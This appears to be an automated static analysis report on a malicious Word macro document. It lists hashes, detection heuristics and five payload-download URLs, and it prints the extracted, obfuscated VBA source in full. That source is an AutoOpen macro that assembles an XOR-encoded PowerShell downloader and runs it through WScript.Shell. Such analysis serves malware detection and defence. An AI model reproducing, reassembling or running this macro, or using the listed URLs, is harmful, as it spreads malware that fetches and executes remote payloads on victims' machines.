Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8cfe845de49e0db…

MALICIOUS

Office (OLE)

Size: 232.2 KB
Created: 2018-07-04 12:32:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: b3c463033af67e9225016f6cba6a5f1b
SHA-1: da975fdceca9fc057f1138c3c25cb62370044a42
SHA-256: c8cfe845de49e0dbc52e306ed2be01f67eee457628f2bf93082ec6b15853197f
Risk Score: 350

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The macros use WScript.Shell and CreateObject to execute commands, as indicated by the 'OLE_VBA_SHELL' and 'OLE_VBA_CREATEOBJ' heuristics. The AutoOpen macro suggests an attempt to run malicious code automatically when the document is opened. The script attempts to construct a command string that likely involves 'powershell' and 'wscript.exe', indicating downloader or dropper functionality.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6600750-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6600750-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb)
    tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734)
       qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb)
    tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734)
       qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX)
  • Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "msbilcAZjT"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://wildpete.com/73v5/ (Referenced by macro)
    • http://www.escoladeemagrecimento.com.br/jl/ (Referenced by macro)
    • http://www.southgatetowerquan7.com.vn/aokE/ (Referenced by macro)
    • http://www.salinzada.com/4A3bU8Pb/ (Referenced by macro)
    • http://www.tomsbigworld.com/VKT9j/ (Referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13594 bytes
SHA-256: 35785d4fb878d2e9da86f724cc3de35b0179316c6a7022ce6716fff3c483562a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
325 of 610 identifiers look randomly generated (e.g. 'drTTsRzRjjC') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "bGQHJKU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "msbilcAZjT"
Sub AutoOpen()
On Error Resume Next
   zCqEo = 40375 + lBOCU * kpcJi / iCFiCA / KQRqb / qDdMD
   JLAZQ = 82535 + PWumn * TUMpq / NzNzCN / NXjaSu / iuLJWD
   rXlLI = 1342 + rGJqAA * rTJrY / DXKwUK / viJHdZ / rHtqwd
   ZfHOU = 80265 + SWvDz * PLvOwM / cpjwbr / jYICTm / oSGihX
   vAoWS = 92992 + TzzLJO * jwKndz / uOskNT / tojQpY / prZIvM
   XaslMP = 65353 + CvnCRI * Otwqif / MLPVo / jivMRw / wSjiDH
   YKrJY = 78259 + TwuEZ * BmwmFd / ZKRuT / IuHkii / JVDAao
   sLzbQc = 35544 + KEjFw * OhVqb / AUzal / bsvMN / bDRAOn
lGcTDksjQ (Qtdlrz + GPMUXw)
   MOZYr = 55435 + zTklK * cGcYMW / zAZLzq / ivwOSh / OnbvHz
   UoJUCa = 52391 + dDwNVG * rPlls / PvBZR / SjiSWN / hrYjTv
   TIIKB = 41923 + Uatnr * ILoNaB / hEWWSd / NTBcE / RdsRA
   tdKUoG = 96994 + ZNGjH * FsIul / IDwkcz / ZbTfRq / fllhl
End Sub

Function Qtdlrz()
On Error Resume Next
jnKJLW = 82677 - LEunCu * 55250 + LYlAq - (pOVwQN / fQYNDl - kNfGaC - lkSizj - (awTSn - 77916 - voNFdD + 61301))
   bsftb = (KZsRmd + iVjuXr - 55600 / lzpiG * 64822 - LOmWET)
   WZwIkQ = sianIE / 58476 / TRiQE - EuPzu + 77526 * SBwzG * Otjqwz * FpsAfs + (ltnzm + WRiiLp)
   YZddoC = QJnaf / 38354 / MPCPRC - nZNzM + 60758 * zOzfJ * DfLOL * kBcFNT + (zKBcT + nFkAQj)
cMMZqFPd = "wershe" + "ll   " + "       " + "         " + "&" + Chr(40) + " $" + "Env:" + "COMsPe" + "C[4,24" + ",25]-jOiN" + "''" + Chr(41) + Chr(40) + " -jOi" + "N " + Chr(40) + "'4f65"
KAjGC = GThPn / 56177 / ifaJm - zOfAft + 97293 * iCRjKZ * GzjRa * hwYFvw + (jXHffa + wfAEN)
   WiTuqv = zZhDo / 7167 / RVLUAd - hPvmdl + 42096 * Sivhk * BhiOR * TYczoP + (VjZjP + hpSXI)
   bcQPj = DDciqr / 23279 / QSGuk - XwGvlD + 69454 * DazfE * NEfJZ * sWEoQ + (TStfZF + QfdWV)
   dtpABl = notLm / 94642 / SEBuR - zjRUXB + 82713 * nrkiK * vYDWCD * AiYhs + (kCLiiE + fubUcA)
piCfOtR = "N81p105N" + "29u78L6" + "9L87N1" + "3L79N" + "66p74" + "S69K67" + "f84O0"
SYwRk = FWvWii / 28445 / vAQNK - FQKOBw + 54115 * NdzIE * slLtP * ltnTD + (iLtqHX + MCBOiP)
   AzzJdc = ZtBir / 27294 / wEtmfZ - JbNCd + 39642 * AwjuCI * BhPEQ * KIKzr + (Pjqihz + oqYkGz)
   MlISZW = GWJpXz / 15770 / MdrLD - QbXVa + 23227 * FqXddb * zkUthV * ojAjZn + (qYWXM + vJkwz)
   lAjlM = WRCbIw / 57461 / mbrWmB - iPSBG + 31650 * uqzXu * kbIwo * DVHOPY + (inUSOK + mClNkF)
zQQTD = "f110S6" + "9L84y" + "14u119u" + "69p66N99" + "K76L" + "73O69N7"
XizoO = jPYIa / 8100 / XwFBvB - GkHpR + 58152 * GvGMQ * HiuhX * fuUmwS + (SaqlVL + IOmXJ)
   TXMclD = zKSth / 96781 / CbBCdM - OZXlNw + 70958 * qvOiKj * umiUmh * BZjLAj + (jKGtsE + oqXHWP)
   kDaTR = KmfsDY / 58378 / VMlwJ - cLaQK + 71414 * vJssX * AAcUB * BIBnh + (NrBzvd + NltYdJ)
   jvOdm = jAdKt / 85328 / dHPbYs - wtzvNP + 6907 * mHbwK * nGtYBj * NNqGD + (KGWSAk + MmvTQX)
drTTsRzRjjC = "8O84" + "{27L4" + "u107K114" + "O87f29N7" + "K72{84N" + "84{80" + "K26y1"
ENprvu = dpkoAc / 77354 / YwOYw - VBuWwB + 55443 * OAKBfR * fNFWju * tSnBS + (jVkIIq + LuUzsQ)
   XOWiui = qBVCXM / 46120 / fIoJVs - PobNi + 59613 * KaIii * zrIMVB * EBQcY + (dGniG + EUwhG)
   bjdwzW = skICPv / 5801 / bjujw - sPBtoj + 55122 * tGdSvr * ooEvA * kcGsvf + (TkEIU + jUcEI)
   DIrBYw = Lwmvqo / 90899 / HmvAs - ZRICV + 96406 * IoMjvH * ftahww * EjpNU + (pbhhE + jiqjz)
WvaKbGd = "5L15y8" + "7K73" + "y76y68L80" + "f69p84y69" + "L14y" + "67f79N" + "77O1"
ujOIi = EkjGFU / 49619 / pWLzwS - LfNYJj + 88393 * aYtsr * zDjwR * kktNf + (aaorcB + QjABk)
   wEDJa = ujzjO / 23407 / EwkUl - oAYFj + 13978 * fjXToJ * izrPuG * SobJNV + (zSzJF + KDZwX)
   IKTIi = bhTrS / 60693 / fJBam - sZITc + 67591 * rnbbwC * aJwRcK * DCGiW + (bWuPJ + Brwzq)
   ZmUoGs = PjaVLj / 95875 / wpXBkG - UUsLS + 65464 * EiKHa * XjPvO * GcBBjf + (nCBZz + kCSAv)
RZcvwFmrj = "5L23f19" + "L86p2" + "1K15y96u7" + "2f84K" + "84S80" + "u26f15N15"
BTszmG = wWGwNc / 55056 / qKObI - tFtGw + 64340 * WIiVPs * DXmwVV * liKlF + (HcIzB + vINzrn)
   ZMNivL = JuDSa / 53470 / zzuTSI - HuzCFM + 3228 * BFjTAo * tzFqjW * kkbzJ + (kHzhm + SSOcp)
   rcObb = kwFSXQ / 10705 / rHajUt - dtAiU + 65498 * VpYuKw * iXDioV * BKkjv + (DBnPXu + OjOwH)
   mcPtc = IIJjW / 924 / YMbjPu - mtUBJ + 45826 * vPzJG * ZijmRH * mmtRQP + (WpnzwB + csINkF)
wWpkiwMiE = "N87y87p" + "87O14O69" + "f83y6" + "7p79u76S" + "65u68O6" + "9K69O77p6" + "5p71S82N" + "69N67K73" + "{77L69L78" + "N84N"
ABRlG = MHPLkD / 92502 / tiRVT - UwVvqd + 89091 * cZbpI * fKjwiK * Ucurmc + (Nmsurm + EjVudj)
   NtJaQZ = pcpSI / 31635 / AACltj - GczKEs + 93504 * aYjCpZ * krAqkj * zhplz + (sFcqYv + QKPLh)
   iqkvuV = jzVmJJ / 99995 / aDEBM - qhjzW + 70842 * dLCFdq * mKwrGz * oXHicp + (FRpcTp + JDwYkG)
   mSjfT = jQHNu / 25508 / BJZOtv - XtMdJA + 2635 * GzSVtX * EaDJf * pKchG + (mziki + PitGDV)
uUstmcSYU = "79y14O67f" + "79S77y14" + "{66S" + "82N15N74{" + "76N15N96" + "K72u84L84"
spPsG = dttmDj / 5363 / Qbciwn - GCowcQ + 27988 * cbzCb * zvuoF * AjpwaS + (CFRqk + Mmmau)
   IDKKu = TDAEw / 21499 / Pnijkv - lOdcN + 77078 * ioIwXh * WAizhJ * KmufZu + (bAKVH + jtZhz)
   KPjQKG = bWSfiu / 84099 / saNsXK - MELlNt + 27415 * KVzLvf * Piqtr * jajwsQ + (LZiWS + DfFZt)
   NsHKii = MbKiBi / 36304 / cdbpUc - Slmdsh + 55130 * KFzFdF * QAOwDs * rjsAP + (BdkYLT + WXFpP)
oCVbwLf = "u80K26" + "S15f15u8" + "7S87f87y1" + "4O83p79" + "{85f84f7" + "2N71{6" + "5L84p69L" + "84y79{87" + "S69S82N" + "81y85" + "u65{78p23"
LvUfBr = wQfdQ / 65278 / bwiLYH - Ycbbci + 71307 * jFwojL * TWHIhT * wnDOEH + (qwHXl + SsEZJU)
   pAdEYp = ANbaYY / 2868 / tFksR - kjUYt + 20308 * FtvZjT * AOcTK * aoCJA + (RHcRUw + iEUIfi)
   kajbBi = cHEQaZ / 64095 / oXOddq - IpRuXN + 53088 * iwMUH * HbMVL * isqzMG + (EhKfqI + RqKGKi)
   oVRNE = JjvBIS / 21844 / QwUiR - XlXSWL + 26090 * QRGLd * uXZjHf * XlIXYz + (BrpYtH + CzwrtM)
wEUqXjrocQ = "L14K67" + "f79u77p1" + "4y86f" + "78y15u" + "65L79N" + "75f101" + "L15S9" + "6S72" + "S84p84" + "K80y" + "26K15N15{" + "87N87"
jVTzs = SYtrC / 37965 / wCvGW - KLXoqW + 97320 * iZOGwv * jDoSM * oljLjk + (jiDlii + HJhdd)
   Qdvwo = NsZkal / 95386 / zPuzO - EYbhRV + 1208 * ZasOTZ * IMajQ * ISEwH + (dDiEt + lzsBOi)
   bkwflD = zOzHn / 20618 / VZncKl - DAVcb + 38014 * IaVLpS * EmEac * iRiww + (hwhWE + rbYkc)
   Jjwoo = vwsmRm / 66370 / hYllR - iHmdb + 8382 * szrmT * CRsQt * EAzbvj + (nCkTpm + DYBzS)
bMtEE = "y87p14K" + "83{65y" + "76N73O" + "78S90S" + "65O68S65f" + "14p67p79N"
Qtdlrz = cMMZqFPd + piCfOtR + zQQTD + drTTsRzRjjC + WvaKbGd + RZcvwFmrj + wWpkiwMiE + uUstmcSYU + oCVbwLf + wEUqXjrocQ + bMtEE
   WCVuKL = UajGw / 26852 / JwMSC - vbktn + 54041 * btCbZt * wEwBBm * kDNPK + (TJBiE + jAuScG)
   jMCBB = zcjkp / 15506 / HMYijq - jQOHiB + 98836 * GdPuz * uszwau * SHRvLw + (FitVGV + SwuXAB)
   NlaXEj = bRFAK / 34387 / CKYWd - UfSsUX + 54617 * lCmTu * ZfJfI * HjBEBY + (hiqWvw + NiTiDh)
   qqPTj = wqWAs / 26740 / VndOrv - vivjqV + 31481 * rMbcb * RqmkUH * qIpdhE + (ZEFrH + IHujcL)
End Function
Function GPMUXw()
On Error Resume Next
wGrtCo = OhDMc / 82291 / NaCCYd - AhScG + 41783 * NOfftZ * owLaZ * FlusF + (sHUpLn + avZZRv)
   twKZQ = ODzqdX / 78052 / EaGCIQ - fmGjU + 60645 * JvCII * trzPN * pEcNcU + (wEhoh + vsOME)
   jBSXj = RWYcrc / 98521 / KOmaX - cjsYU + 85602 * wWPYt * HaDTWL * jWirw + (nEQjnz + lpAItD)
   QSAJDw = ruGvPO / 2260 / GwBalE - hpcZw + 87251 * auZTX * NVZnz * wJKkXl + (IiCHSR + ClKhiz)
sWXrIYnYwE = "77u1" + "5p20K97{1" + "9N66p11" + "7O24{" + "112L66f" + "15N96S72" + "L84y" + "84f80K" + "26f15u15"
snZfE = TlOZqd / 88545 / rlutO - NFPGQT + 11721 * jtZwj * FFYzpR * pjnOwv + (cEBfBJ + mYSPlU)
   ZULWw = vPkYNb / 1049 / EXFEo - kjYmG + 3547 * DcLsJA * WpwOau * tzdtrQ + (zNFcpu + qvYQu)
   FVAsz = BlNwD / 94968 / XWbrRX - lbstw + 43173 * ThFiD * sjNnWA * lqrEbE + (RPwaw + BTicH)
   bziEHO = BuoIo / 41846 / dhuko - szlDk + 59755 * quYFlj * ZuDmjp * DccHIE + (kTZtnp + bNiTc)
KlOrBuODH = "K87S" + "87N8" + "7L14{84N7" + "9f77p83" + "N66S7" + "3L71O" + "87K7" + "9p82u7" + "6y68" + "N14p67p7" + "9f77{15f"
tBFot = XrRPLb / 31576 / EliSJ - IucpbE + 65927 * SkULi * vzjdzz * WmpXQl + (ztnFP + PzZPMo)
   JGVjWI = riiHAz / 80273 / XIvbaC - bzLzq + 44284 * hYTHKR * GtkAJp * pRsoz + (DEirC + EfVYZR)
   KZjuA = fRECFT / 18856 / mHnSL - TOYzP + 91298 * VwaTQ * sRwGu * YGzur + (mGLdsl + BVnvAi)
   EjJVii = JQzpAt / 91985 / MWThPc - zsDoWO + 77859 * VvYOS * zcQIsd * NossBO + (RcTSD + mRRpL)
WkkzusEGC = "118S10" + "7u116" + "p25N74{1" + "5f7O14u11" + "5O80{7" + "6S73p84y8" + "y7L96u" + "7f9K27" + "u4f87"
Uazhj = bEqWwJ / 91845 / wkjRTi - HozTE + 64866 * sSGEd * twRNnw * qMsHD + (KqpGF + iLMmA)
   ULbtcf = wOuCYX / 99231 / jELwV - iotcF + 21303 * BjKbz * IdmuP * XPvXZ + (vDODMG + papWiR)
   ftSLY = sjCpB / 36064 / iVOTv - pQtXRD + 23290 * quhjK * zHEAf * cPWIVp + (kbsUs + qKzmW)
   IMOBl = IrBWW / 33378 / oGTat - Ccjbaz + 50495 * PTGBVh * WcONkn * wVOEb + (DKXkD + UYcko)
FsDYVHzbZ = "f102O" + "100p0L" + "29{0" + "p7S22f17N" + "19S7K27{" + "4p82f9" + "9L65{" + "29{4f" + "69K7" + "8K86L"
bYWhWn = nfEjq / 45237 / lSTic - YizDR + 66003 * cTHahO * zBXUUD * smSKM + (sjFwD + tQzZT)
   LftXv = BjOSi / 10075 / JwqdL - WWUlE + 92797 * wUMat * ZIZHSa * tCrrlf + (WuCiv + YSirt)
   oIwUX = CctDjv / 98308 / Ynjrh - EbnwOJ + 44585 * UNCcE * fvQYP * IkNpwJ + (tqGjFr + MNVzGN)
   jHjAH = vicWIb / 86306 / TOwzEK - bOdwkd + 84670 * aQRBi * djooR * PNjbi + (qszWzB + cItCD)
IEijWilum = "26O84p" + "69K77" + "L80N" + "11u7S124" + "K7S1" + "1u4K87L10" + "2K100O1" + "1f7O14S" + "69K88O69" + "{7p27K70L"
bFuHCZ = jELCAS / 26352 / GzBqcB - rWUiz + 62881 * zLMoKd * kuOouf * DrOhXm + (FqIMY + OYnYZM)
   OCLCF = ZKLqhJ / 21752 / GOOiCS - mzTDQQ + 97016 * QjikR * BDLdk * nfBRN + (OzOuPz + lcDswp)
   HzpMH = PWCmCh / 43095 / oiFzb - FsUEbl + 6391 * LHqOi * lDBCa * XzCEFf + (Rauhb + TDPflk)
   jvKvv = zzXkcD / 44050 / WGpPww - mtRaPQ + 28731 * WXQRE * bpHIR * CtpRdE + (wzZPm + luCsUf)
DaCMhadbqj = "79f82N6" + "9K65" + "O67y72" + "O8O4u106" + "f82N" + "77y0N73" + "S78K0f4N"
HwVWUv = nULAbv / 7606 / cRqEA - GPJbE + 27393 * bdMmY * lnGfL * dRCsBW + (UupATA + IAjMu)
   kjBMM = ShvQhH / 63837 / hsEAw - FSWwI + 58240 * TLZwmc * vWrcEs * cBjsIF + (ECwrY + SRJFE)
   jVLrw = CZSmW / 72539 / HWHEWH - ItNmc + 86759 * VNkDuk * QHFLun * WBITP + (tjBvNE + GnIZOF)
   hLijbB = rOBtcU / 69784 / sFTNEs - Moppuq + 56068 * jwoLmK * ZrNGC * zClkG + (uCGAB + tzttmH)
qhzcIImjBp = "107{1" + "14N87u9O" + "91O84u82S" + "89u91L4f" + "65p81" + "O105S14u" + "100f" + "79{87y" + "78K76p79" + "S65N" + "68S102u73"
EQzzWs = BTjhGd / 60618 / Mauuii - YRqXn + 86656 * lhDzu * cWWII * rEDaj + (nsTrB + Rwirh)
   OOVznI = bYfbzz / 81127 / MmDFn - izZvm + 53700 * LZjFGO * DdFzbI * VWiBDt + (mHphT + fRwBA)
   wFpth = dIibB / 80532 / mlNrR - rHTAA + 78781 * fwfwVk * NJDfwW * zaVMq + (nPWEHQ + qCfEo)
   nVhdl = RBpch / 64525 / vTujwn - LGQaa + 79487 * OwLiw * tijQzj * Zczmo + (OUCwV + RdthFG)
jUzzuwGP = "u76u69p8" + "K4{106L82" + "K77{12N0f" + "4K82S99y" + "65y9{" + "27N115f8" + "4N65L" + "82K84K1" + "3L112" + "u82u79S" + "67S69{83"
cwLMU = abOJoq / 60711 / MczjE - zVqczn + 92158 * qjYim * EPwCz * sIdAkl + (bJntRk + DHIjM)
   wACCi = iqzMnd / 68495 / hliId - EbkMCp + 94586 * NABaJu * GWZTnF * OIPSlS + (sKZbVw + PqAoB)
   tIkikK = aTwfu / 73068 / mprpr - zUIDn + 14627 * PBwHNp * DjXvQ * hPHMHw + (dkNQTr + iYzhud)
   oYWpR = UDDRv / 48141 / hiNvv - cQiojn + 42143 * iijqAn * sqlXp * KZhvUu + (RzLElF + zKkqB)
mtwFZ = "y83f0K4p8" + "2u99u65S2" + "7O66L8" + "2L69O65u" + "75p27N9" + "3O67O65" + "y84u" + "67L72L91{"
zzvFn = BLPuri / 46520 / kbzbkz - lEDVN + 31929 * tsTvZ * aJYXTC * UunQiU + (XZqdUp + OurjaQ)
   NmYTbu = GoscXF / 91679 / rwsLt - aiTfEv + 74308 * iFuWt * XAOUZI * dHjjf + (iHNsi + AnEFo)
   SXbwIa = bCZHi / 39534 / rRnqt - qTBqa + 70617 * LOhotl * BWLUWt * wXQVmU + (XdDshs + wVlVXb)
   MUlNw = DUFTUz / 84309 / wlUoQG - livMtt + 4886 * ZwwSj * CfIprq * XkYhA + (CkRhH + LbqqA)
VpjAmSd = "93N93'" + ".SpLIt" + Chr(40) + "'S" + "NKOLp" + "fyu{'" + Chr(41) + "|" + " % {" + " [ChaR" + "] " + Chr(40) + " " + "$_ -Bxo" + "r " + Chr(34) + "0x" + "20" + Chr(34) + Chr(41) + "} " + Chr(41) + Chr(41)
GPMUXw = sWXrIYnYwE + KlOrBuODH + WkkzusEGC + FsDYVHzbZ + IEijWilum + DaCMhadbqj + qhzcIImjBp + jUzzuwGP + mtwFZ + VpjAmSd
   fkqzh = ENSaC / 42566 / UfDtrk - hHruv + 29867 * laLof * JWPww * OBWQfY + (RzqGCJ + WYXtw)
   kATjV = hLItF / 22898 / ZPlNtW - soAQHQ + 81767 * UJMpHl * pjrOC * ovIfF + (iFaNwT + KvADY)
   RuTmG = WCVwPF / 92421 / WBKrM - EwWuT + 18157 * MzlwWB * JTijJu * ovAbB + (twUNj + awTYYS)
   FJFkzt = CGCSb / 64275 / UQCVT - DlQcY + 34343 * bvpvJR * oriLB * zDntBl + (PFiRDE + tUtdMh)
End Function


Attribute VB_Name = "kMGQLqGH"
Function lGcTDksjQ(cqXUlPIviPO)
On Error Resume Next
   CCrFDm = (NulNh - PwwCms + pkPLd * hwIMkA)
   PoiEip = (ZroQZi - ippFr + GbJbG * zhYmti)
   cDqjmT = (GMpwtL - AiWAAQ + rofGz * rzAEvh)
   ifwqR = (OOuzCR - BXuww + DOnRm * cOEDEh)
   UtFXL = (AwXGTA - YoCjmY + GPLuw * phXQJ)
   MUMjw = (kpiEu - NuEnKD + OSzwv * LKphJ)
   pPBED = (nwqNcY - siZmX + uAvTjP * RWmzu)
   SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb)
tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734)
   qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX)
   zahUU = (PcYcu - sRScYw + JdITpT * jdjUvE)
   QvBlZ = (KzKbw - XMPrwV + TScoG * AUomwE)
   suktZ = (WafIJ - jkEiV + OFmFu * OXwaZR)
End Function